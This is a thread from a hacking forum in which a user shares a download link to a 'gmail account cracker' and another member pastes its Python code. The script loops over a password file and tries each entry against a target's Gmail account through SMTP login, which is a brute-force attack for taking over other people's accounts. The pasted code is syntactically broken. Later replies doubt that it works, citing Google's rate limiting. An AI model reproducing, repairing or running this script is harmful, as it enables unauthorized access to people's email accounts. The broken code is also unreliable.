![]() |
|
Leak Python - gmail account cracker - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Hacking (https://sinister.ly/Forum-Hacking) +--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking) +--- Thread: Leak Python - gmail account cracker (/Thread-Leak-Python-gmail-account-cracker) |
Python - gmail account cracker - mkadem1997 - 01-18-2018 code: https://www.up-4ever.com/y4v9rsznyuva RE: Python - gmail account cracker - Synthx - 01-18-2018 Spoiler: This is the code from the downloadCode: imports smtplib
imports argparse
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="Target")
parser.add_argument("-f", "--file", help="Password File")
args = parser.parse_args()
stop = False
if args.target and args.file:
stop = True
printf "Gmail Account Cracker"
passwordfile = open(args.file, "r")
for line in passwordfile:
print "Attempted Password: '+line
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
try:
server.login(args.target, line)
print '[!] Password: '+line
a = raw_input()
exit()
except smtplib.SMTPAuthenticationError:
pass
if '__main__' == __name__:
if stop == False:
printf 'Error, correct syntax: python script.py -t <target> -f <passfile>'For some reason, I feel like this wouldn't work as I feel that Google would start refusing your connections after a certain point. That aside, oh dear god, is that really Python? Quote:printf "Gmail Account Cracker" Edit: I know Python3 which is why I am even asking... I've never even seen printf used in python2 that I know of..... RE: Python - gmail account cracker - karansudhi - 02-25-2018 i want to learn it where i can start it i dont know any thing about coding RE: Python - gmail account cracker - Sun0228 - 02-25-2018 Didn't check but it's unlikely that it would w3rk. It's python:!! Quote:def printf(format, *values): RE: Python - gmail account cracker - mothered - 02-26-2018 (02-25-2018, 08:36 PM)karansudhi Wrote: i want to learn it where i can start it i dont know any thing about coding To remain on-topic, I suggest you create a thread. As such, members can address all questions and concerns. RE: Python - gmail account cracker - --null-- - 03-11-2018 Google definitely checks how many requests you send to their login page. Thats why hydra attacks never work because Google sends a fake "correct" response to your attempt. RE: Python - gmail account cracker - Cjone1700 - 03-14-2018 Had anyone tried using this tool? And does it actually work? RE: Python - gmail account cracker - C1PH3RH3XX - 04-24-2018 Dude you should study about rate limiting. Bruteforce tools dont work at all nowdays on top level domains like gmail or facebook. If you want to know why they dont work then study about rate limiting. |